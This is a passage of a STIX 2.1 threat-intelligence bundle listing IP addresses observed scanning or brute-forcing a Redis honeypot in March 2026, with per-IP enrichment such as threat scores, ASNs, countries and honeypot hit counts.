      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.207.238.171']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T08:25:03.000Z",
      "valid_until": "2026-05-02T08:25:02.000Z"
    },
    {
      "created": "2026-03-31T09:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0",
      "id": "indicator--52c1689f-89b7-4ac8-8e2f-2bef7352cd08",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T09:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '164.68.108.231']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T09:25:03.000Z",
      "valid_until": "2026-05-02T09:25:01.000Z"
    },
    {
      "created": "2026-03-31T09:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0",
      "id": "indicator--38082945-bb27-4916-b8fe-aa0e9290b930",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T09:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '34.135.208.93']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T09:25:03.000Z",
      "valid_until": "2026-05-02T09:25:01.000Z"
    },
    {
      "created": "2026-03-31T09:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--e580a70b-37e9-4779-95a8-96a668d76758",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T09:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.195.158']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T09:25:03.000Z",
      "valid_until": "2026-05-02T09:25:01.000Z"
    },
    {
      "created": "2026-03-31T11:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=48; ports=6379; cc=DE; asn=212512; asn_org=Detai Prosperous Technologies Limited; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--8f6cb2eb-dcc9-4e11-8ad8-ceab7b9b8c59",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T11:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.82.78.106']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T11:25:02.000Z",
      "valid_until": "2026-05-02T11:25:01.000Z"
    },
    {
      "created": "2026-03-31T12:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--63288580-0fe3-4b5d-8e20-507a2560d3e0",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T12:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '74.82.47.62']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T12:25:10.000Z",
      "valid_until": "2026-05-02T12:25:09.000Z"
    },
    {
      "created": "2026-03-31T13:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--c3c553eb-9735-4bb7-9379-477418cf5343",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T13:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.79.153.72']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T13:25:03.000Z",
      "valid_until": "2026-05-02T13:25:01.000Z"
    },
    {
      "created": "2026-03-31T14:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--e7f7536b-639d-433a-99bf-6a36d64b71ee",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T14:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.84.41.22']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T14:25:02.000Z",
      "valid_until": "2026-05-02T14:25:01.000Z"
    },
    {
      "created": "2026-03-31T14:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--c1c29843-6920-402e-b020-aff80b1cb14b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T14:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.98.164.46']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T14:25:02.000Z",
      "valid_until": "2026-05-02T14:25:01.000Z"
    },
    {
      "created": "2026-03-31T17:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=HU; asn=56322; asn_org=ServerAstra Kft.; redis_cmds=MODULE LIST; redis_cmd_hits=0",
      "id": "indicator--cb517949-d420-4b4b-9ddc-5e36a6e55197",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T17:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '91.219.237.11']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T17:25:03.000Z",
      "valid_until": "2026-05-02T17:25:01.000Z"
    },
    {
      "created": "2026-03-31T22:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=55; ports=6379; cc=VN; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--104d1423-1731-49f8-aef3-5c6d7aee10e0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T22:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '152.32.250.21']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T22:25:03.000Z",
      "valid_until": "2026-05-02T22:25:01.000Z"
    },
    {
      "created": "2026-03-31T22:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--fed758bd-83c2-47bd-b7f0-5c8e92e8791c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T22:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.69']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T22:25:03.000Z",
      "valid_until": "2026-05-02T22:25:01.000Z"
    },
    {
      "created": "2026-03-31T23:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--43b07099-00fd-4dc6-87aa-64d38c2f6ae0",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T23:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '118.212.121.21']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T23:25:04.000Z",
      "valid_until": "2026-05-02T23:25:02.000Z"
    },
    {
      "created": "2026-03-31T23:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--0ec69c9b-429a-4392-ba6a-5f4650361ff4",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T23:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '118.212.123.61']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T23:25:04.000Z",
      "valid_until": "2026-05-02T23:25:02.000Z"
    },
    {
      "created": "2026-03-31T23:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--31c1d757-8fba-471c-8640-a50d890f6495",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T23:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '139.212.70.177']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T23:25:04.000Z",
      "valid_until": "2026-05-02T23:25:02.000Z"
    },
    {
      "created": "2026-03-31T23:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--a2ad6b24-ae96-40c4-acdb-e1d78dea2003",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T23:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '182.138.158.161']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T23:25:04.000Z",
      "valid_until": "2026-05-02T23:25:02.000Z"
    },
    {
      "created": "2026-03-31T23:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=13; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--72f291f6-725c-470e-b174-f5b7b51ab328",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-31T23:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '182.138.158.236']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T23:25:04.000Z",
      "valid_until": "2026-05-02T23:25:02.000Z"
    },
    {
      "created": "2026-03-31T23:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--7e7e8f59-6637-45de-917c-bfc3563810aa",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-31T23:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '223.199.181.58']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-31T23:25:04.000Z",
      "valid_until": "2026-05-02T23:25:02.000Z"
    }
  ],
  "spec_version": "2.1",
  "type": "bundle",
  "x_nadsec_enrichment": {
    "enriched_at": "2026-03-31T23:52:04.004703+00:00",
    "sensor": "redishoneypot",
    "sensor_type": "redis_honeypot",
    "month": "2026-03",
    "ip_count": 780,
    "total_attacks": 25796,
    "total_sessions": 0,
    "attack_type_distribution": {
      "scanning": 25796
    }
  },
  "x_nadsec_ip_context": {
    "77.83.240.70": {
      "attack_count": 90,
      "first_seen": "2026-03-09T07:40:58.000Z",
      "last_seen": "2026-03-09T07:47:21.657Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 49870,
      "as_org": "Alsycon B.V.",
      "threat_score": 68.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 30491,
        "days_active_30d": 22,
        "ports_targeted_30d": 1910,
        "honeypots_triggered_30d": 17,
        "first_seen_30d": "2026-03-02T02:22:27.251000+00:00",
        "last_seen_30d": "2026-03-23T14:46:45.042000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 20931,
        "Honeytrap": 9051,
        "Sentrypeer": 289,
        "Cowrie": 57,
        "Dionaea": 36,
        "Miniprint": 27,
        "Mailoney": 21,
        "Redishoneypot": 18,
        "ConPot": 17,
        "Adbhoney": 12,
        "Dicompot": 12,
        "Ciscoasa": 5,
        "ElasticPot": 3,
        "H0neytr4p": 3,
        "Honeyaml": 3,
        "Ipphoney": 3,
        "Tanner": 3
      }
    },
    "172.86.113.129": {
      "attack_count": 66,
      "first_seen": "2026-03-08T17:02:40.000Z",
      "last_seen": "2026-03-08T17:03:52.565Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Dallas",
      "asn": 14956,
      "as_org": "RouterHosting LLC",
      "threat_score": 15.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 19.6,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 92,
        "days_active_30d": 1,
        "ports_targeted_30d": 11,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-08T17:02:40+00:00",
        "last_seen_30d": "2026-03-08T17:12:54.315000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Suricata": 38,
        "Redishoneypot": 22,
        "Cowrie": 17,
        "Honeytrap": 12,
        "Dionaea": 2,
        "ElasticPot": 1
      }
    },
    "152.32.128.169": {
      "attack_count": 59,
      "first_seen": "2026-03-04T21:26:21.000Z",
      "last_seen": "2026-03-04T22:04:26.052Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Hong Kong",
      "country_code": "HK",
      "city": "Hong Kong",
      "asn": 135377,
      "as_org": "UCLOUD INFORMATION TECHNOLOGY HK LIMITED",
      "threat_score": 91.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 22.7,
        "persistence": 23.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 186,
        "days_active_30d": 28,
        "ports_targeted_30d": 16,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-04T20:33:03.325000+00:00",
        "last_seen_30d": "2026-03-31T06:49:48.499000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 109,
        "Honeytrap": 53,
        "Redishoneypot": 14,
        "Dionaea": 7,
        "Mailoney": 3
      }
    },
    "114.113.235.163": {
      "attack_count": 55,
      "first_seen": "2026-03-05T10:34:49.000Z",
      "last_seen": "2026-03-28T18:10:06.659Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4808,
      "as_org": "China Unicom Beijing Province Network",
      "threat_score": 38.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 11.1,
        "persistence": 20.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 13,
        "days_active_30d": 24,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T10:35:50.967000+00:00",
        "last_seen_30d": "2026-03-28T18:10:06.659000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 10,
        "Redishoneypot": 3
      }
    },
    "152.32.250.21": {
      "attack_count": 55,
      "first_seen": "2026-03-31T21:54:08.000Z",
      "last_seen": "2026-03-31T22:19:24.598Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Vietnam",
      "country_code": "VN",
      "city": "Ho Chi Minh City",
      "asn": 135377,
      "as_org": "UCLOUD INFORMATION TECHNOLOGY HK LIMITED",
      "threat_score": 70.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 21.7,
        "persistence": 15.0,
        "diversity": 14,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 149,
        "days_active_30d": 18,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-14T04:06:24.882000+00:00",
        "last_seen_30d": "2026-03-31T22:19:24.598000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 92,
        "ElasticPot": 26,
        "Honeytrap": 17,
        "Redishoneypot": 14
      }
    },
    "165.154.174.206": {
      "attack_count": 55,
      "first_seen": "2026-03-19T16:06:26.000Z",
      "last_seen": "2026-03-19T16:25:53.156Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": "City of London",
      "asn": 135377,
      "as_org": "UCLOUD INFORMATION TECHNOLOGY HK LIMITED",
      "threat_score": 92.4,
      "threat_level": "critical",
      "score_components": {
        "frequency": 26.5,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 451,
        "days_active_30d": 25,
        "ports_targeted_30d": 17,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-07T18:29:38.892000+00:00",
        "last_seen_30d": "2026-03-31T18:03:21.769000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 277,
        "Honeytrap": 101,
        "ElasticPot": 55,
        "Redishoneypot": 14,
        "Honeyaml": 4
      }
    },
    "176.32.195.85": {
      "attack_count": 52,
      "first_seen": "2026-03-03T09:00:54.000Z",
      "last_seen": "2026-03-23T19:53:44.322Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Armenia",
      "country_code": "AM",
      "city": null,
      "asn": 197834,
      "as_org": "Ucom CJSC",
      "threat_score": 68.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 25.6,
        "persistence": 19.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 362,
        "days_active_30d": 23,
        "ports_targeted_30d": 52,
        "honeypots_triggered_30d": 9,
        "first_seen_30d": "2026-03-02T03:05:12+00:00",
        "last_seen_30d": "2026-03-24T09:44:44.065000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 263,
        "Honeytrap": 57,
        "Redishoneypot": 12,
        "Dionaea": 10,
        "ElasticPot": 7,
        "Cowrie": 6,
        "ConPot": 4,
        "Honeyaml": 2,
        "Tanner": 1
      }
    },
    "185.224.128.16": {
      "attack_count": 39,
      "first_seen": "2026-03-03T08:17:51.000Z",
      "last_seen": "2026-03-30T08:56:33.590Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Netherlands",
      "country_code": "NL",
      "city": "Amsterdam",
      "asn": 49870,
      "as_org": "Alsycon B.V.",
      "threat_score": 95.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 1525,
        "days_active_30d": 30,
        "ports_targeted_30d": 198,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T01:12:17.652000+00:00",
        "last_seen_30d": "2026-03-31T23:30:36.978000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1154,
        "Honeytrap": 360,
        "Adbhoney": 8,
        "Redishoneypot": 3
      }
    },
    "47.236.24.189": {
      "attack_count": 37,
      "first_seen": "2026-03-06T10:22:20.000Z",
      "last_seen": "2026-03-25T19:40:08.818Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Singapore",
      "country_code": "SG",
      "city": null,
      "asn": 45102,
      "as_org": "Alibaba US Technology Co., Ltd.",
      "threat_score": 30.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.5,
        "persistence": 16.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 9,
        "days_active_30d": 20,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T10:23:25.248000+00:00",
        "last_seen_30d": "2026-03-25T19:40:08.818000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Suricata": 6,
        "Redishoneypot": 3
      }
    },
    "61.240.139.28": {
      "attack_count": 37,
      "first_seen": "2026-03-21T22:54:58.000Z",
      "last_seen": "2026-03-30T07:08:26.043Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 30.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 11.5,
        "persistence": 8.3,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 14,
        "days_active_30d": 10,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-21T22:56:03.669000+00:00",
        "last_seen_30d": "2026-03-30T07:08:26.043000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 5
      }
    },
    "120.48.43.118": {
      "attack_count": 31,
      "first_seen": "2026-03-05T23:34:35.000Z",
      "last_seen": "2026-03-29T01:52:28.364Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 38365,
      "as_org": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
      "threat_score": 33.2,
      "threat_level": "low",
      "score_components": {
        "frequency": 7.8,
        "persistence": 20.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 25,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T23:35:44.294000+00:00",
        "last_seen_30d": "2026-03-29T01:52:28.364000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 6
      }
    },
    "20.197.32.228": {
      "attack_count": 27,
      "first_seen": "2026-03-04T18:52:39.000Z",
      "last_seen": "2026-03-10T00:24:09.267Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "India",
      "country_code": "IN",
      "city": "Pune",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 8.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 10.8,
        "persistence": 5.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 7,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-04T18:52:39+00:00",
        "last_seen_30d": "2026-03-10T00:24:09.267000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 3
      }
    },
    "3.239.13.6": {
      "attack_count": 26,
      "first_seen": "2026-03-09T03:59:43.000Z",
      "last_seen": "2026-03-23T02:30:34.385Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 76.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 26.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 435,
        "days_active_30d": 30,
        "ports_targeted_30d": 182,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:11:56.761000+00:00",
        "last_seen_30d": "2026-03-31T20:11:56.527000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 435
      }
    },
    "64.62.197.152": {
      "attack_count": 26,
      "first_seen": "2026-03-16T14:33:20.000Z",
      "last_seen": "2026-03-16T14:35:05.367Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 95.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 318,
        "days_active_30d": 30,
        "ports_targeted_30d": 97,
        "honeypots_triggered_30d": 9,
        "first_seen_30d": "2026-03-02T03:19:46+00:00",
        "last_seen_30d": "2026-03-31T14:20:33.038000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 190,
        "Honeytrap": 98,
        "Redishoneypot": 11,
        "ConPot": 6,
        "Cowrie": 5,
        "Adbhoney": 4,
        "Dionaea": 2,
        "CitrixHoneypot": 1,
        "ElasticPot": 1
      }
    },
    "74.82.47.4": {
      "attack_count": 26,
      "first_seen": "2026-03-22T14:24:53.000Z",
      "last_seen": "2026-03-22T14:26:41.730Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Gunnison",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 95.6,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.6,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 365,
        "days_active_30d": 30,
        "ports_targeted_30d": 64,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-02T02:15:03+00:00",
        "last_seen_30d": "2026-03-31T14:40:10.672000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 217,
        "Honeytrap": 91,
        "Ciscoasa": 13,
        "Redishoneypot": 11,
        "Cowrie": 9,
        "Miniprint": 9,
        "Mailoney": 6,
        "Dionaea": 4,
        "Tanner": 3,
        "Honeyaml": 2
      }
    },
    "37.114.50.108": {
      "attack_count": 25,
      "first_seen": "2026-03-05T22:32:53.000Z",
      "last_seen": "2026-03-22T18:23:28.393Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": null,
      "asn": 58087,
      "as_org": "Florian Kolb",
      "threat_score": 24.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
